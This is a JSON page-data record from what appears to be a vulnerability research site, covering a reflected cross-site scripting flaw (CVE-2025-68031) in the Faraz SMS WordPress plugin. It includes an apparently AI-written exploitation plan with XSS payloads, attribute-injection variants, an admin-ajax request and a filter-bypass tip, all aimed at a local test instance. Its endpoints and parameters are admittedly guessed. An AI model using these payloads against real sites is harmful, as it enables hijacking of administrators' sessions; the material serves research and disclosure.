[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fMiKECN67LjBQB87zfSW65ft0DgfB52RNvQT9nXi1O38":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":25,"research_model_used":26,"research_started_at":27,"research_completed_at":28,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":29},"CVE-2025-68031","reflected-cross-site-scripting-2","افزونه پیامک حرفه ای فراز اس ام اس \u003C= 2.7.3 - Reflected Cross-Site Scripting","The افزونه پیامک حرفه ای فراز اس ام اس plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 2.7.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","farazsms",null,"\u003C=2.7.3","medium",6.1,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:R\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-01-27 00:00:00","2026-02-02 16:22:08",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fab573de3-e05a-4946-8734-8cb18d05ad69?source=api-prod",[],"researched",false,3,"This research plan targets **CVE-2025-68031**, a Reflected Cross-Site Scripting (XSS) vulnerability in the **افزونه پیامک حرفه ای فراز اس ام اس (farazsms)** plugin. Since the source code is not provided, this plan relies on common patterns in this plugin's architecture and standard WordPress XSS sinks.\n\n---\n\n### 1. Vulnerability Summary\nThe \"Faraz SMS\" plugin for WordPress fails to sufficiently sanitize and escape user-supplied input before reflecting it back into the web page. This allows an unauthenticated attacker to craft a malicious URL containing a JavaScript payload. When a victim (especially an authenticated administrator) clicks the link, the script executes in their browser context.\n\n### 2. Attack Vector Analysis\n*   **Endpoint**: Likely a frontend page where the plugin processes SMS subscription results, or a specific admin-ajax handler that returns HTML.\n*   **Vulnerable Parameter**: Likely a feedback or status parameter such as `message`, `msg`, `fsms_status`, or `phone` (inferred).\n*   **Authentication**: None (Unauthenticated).\n*   **Preconditions**: The victim must be tricked into clicking a specially crafted link. If the reflection occurs on an admin page, the victim must be logged in as an administrator.\n\n### 3. Code Flow (Inferred)\n1.  **Entry Point**: A request is made to a URL containing a specific query parameter (e.g., `wp-admin\u002Fadmin.php?page=farazsms_settings&message=...` or a frontend page like `?fsms_result=...`).\n2.  **Processing**: The plugin's initialization logic (hooked to `init` or `admin_init`) or a specific page callback retrieves the parameter using `$_GET` or `$_REQUEST`.\n3.  **Sink**: The code calls `echo` or `printf` on the raw parameter without applying `esc_html()`, `esc_attr()`, or `wp_kses()`.\n    *   *Example Vulnerable Pattern:* `echo '\u003Cdiv class=\"updated\">\u003Cp>' . $_GET['message'] . '\u003C\u002Fp>\u003C\u002Fdiv>';`\n\n### 4. Nonce Acquisition Strategy\nReflected XSS via `GET` parameters typically occurs before or independently of nonce checks. However, if the reflection occurs within an AJAX response or a form submission that *does* require a nonce, use the following strategy:\n\n1.  **Identify Shortcodes**: Search for plugin shortcodes:\n    `grep -r \"add_shortcode\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Ffarazsms\u002F`\n    *(Commonly `[farazsms_newsletter]` or `[farazsms_verification]`)*.\n2.  **Create Setup Page**: Create a page containing the found shortcode:\n    `wp post create --post_type=page --post_status=publish --post_content='[SHORTCODE_NAME]'`\n3.  **Extract Nonce**:\n    *   Navigate to the newly created page.\n    *   Use `browser_eval` to find the localization object.\n    *   Look for variables like `window.farazsms_ajax?.nonce` or `window.fsms_obj?.ajax_nonce`.\n\n### 5. Exploitation Strategy\nThe goal is to find a reflected parameter and execute `alert(document.domain)`.\n\n#### Step 1: Discovery (Grep for Sinks)\nRun these commands in the plugin directory to find the exact vulnerable line:\n```bash\n# Search for raw echoes of GET\u002FREQUEST parameters\ngrep -rP \"echo\\s+\\\\\\$_(GET|REQUEST)\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Ffarazsms\u002F\ngrep -rP \"printf\\(.*\\\\\\$_(GET|REQUEST)\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Ffarazsms\u002F\n```\n\n#### Step 2: Payload Construction\nBased on the discovery, construct a URL. If the sink is inside an HTML tag attribute, use:\n`\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>`\nIf the sink is inside a `\u003Cdiv>` or `\u003Cp>`, use:\n`\u003Cscript>alert(document.domain)\u003C\u002Fscript>`\n\n#### Step 3: Request Execution\nUse the `http_request` tool to simulate a victim clicking the link.\n*   **Method**: `GET`\n*   **URL**: `http:\u002F\u002Flocalhost:8080\u002F[VULNERABLE_PAGE]?[VULNERABLE_PARAM]=%3Cscript%3Ealert(document.domain)%3C\u002Fscript%3E`\n\n### 6. Test Data Setup\n1.  **Install Plugin**: Ensure `farazsms` version \u003C= 2.7.3 is installed and active.\n2.  **Configuration**: Some XSS reflections only occur if certain settings are enabled (e.g., \"Show success message after subscription\").\n3.  **Create Victim User**:\n    `wp user create victim victim@example.com --role=administrator --user_pass=password`\n\n### 7. Expected Results\n*   The HTTP response body must contain the literal, unescaped string `\u003Cscript>alert(document.domain)\u003C\u002Fscript>`.\n*   If using `browser_navigate`, the browser should trigger an alert dialog (observable via console logs or screenshots).\n\n### 8. Verification Steps\n1.  **Source Verification**:\n    `curl -s \"http:\u002F\u002Flocalhost:8080\u002F?vulnerable_param=\u003Cscript>alert(1)\u003C\u002Fscript>\" | grep \"\u003Cscript>alert(1)\u003C\u002Fscript>\"`\n2.  **Context Check**: Verify if the script is reflected inside a sensitive area (like the WordPress Admin Dashboard) which would allow for session hijacking or unauthorized administrative actions.\n\n### 9. Alternative Approaches\n*   **Attribute Injection**: If the input is reflected inside an attribute (e.g., `\u003Cinput value=\"[INPUT]\">`), try:\n    `\" onmouseover=\"alert(1)\"` or `\" autofocus onfocus=\"alert(1)\"`\n*   **Admin-Ajax Reflection**: Check if `admin-ajax.php` actions reflect input in their error\u002Fsuccess responses:\n    ```bash\n    # Example (inferred)\n    http_request(\n        method=\"POST\",\n        url=\"http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php\",\n        body=\"action=farazsms_test&msg=\u003Cscript>alert(1)\u003C\u002Fscript>\",\n        headers={\"Content-Type\": \"application\u002Fx-www-form-urlencoded\"}\n    )\n    ```\n*   **Double Encoding**: If a simple payload is blocked, try URL-encoding the payload twice to bypass basic security filters.","The افزونه پیامک حرفه ای فراز اس ام اس (Faraz SMS) plugin for WordPress is vulnerable to Reflected Cross-Site Scripting (XSS) in versions up to 2.7.3. This occurs because the plugin fails to sanitize and escape user-supplied input from URL parameters before reflecting it in the page, allowing unauthenticated attackers to execute arbitrary JavaScript in a victim's browser.","The exploit involves identifying a plugin-generated page (either in the WordPress admin dashboard or a frontend form) that reflects query parameters back into the HTML. An attacker crafts a malicious URL containing a JavaScript payload—such as `\u003Cscript>alert(document.domain)\u003C\u002Fscript>`—within a parameter like 'message', 'msg', or 'fsms_status'. The attacker then tricks an authenticated user (typically an administrator) into clicking the link, causing the script to execute in the context of the victim's session, which could lead to unauthorized actions or cookie theft.","gemini-3-flash-preview","2026-05-04 23:24:57","2026-05-04 23:25:19",{"type":30,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":31},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Ffarazsms\u002Ftags"]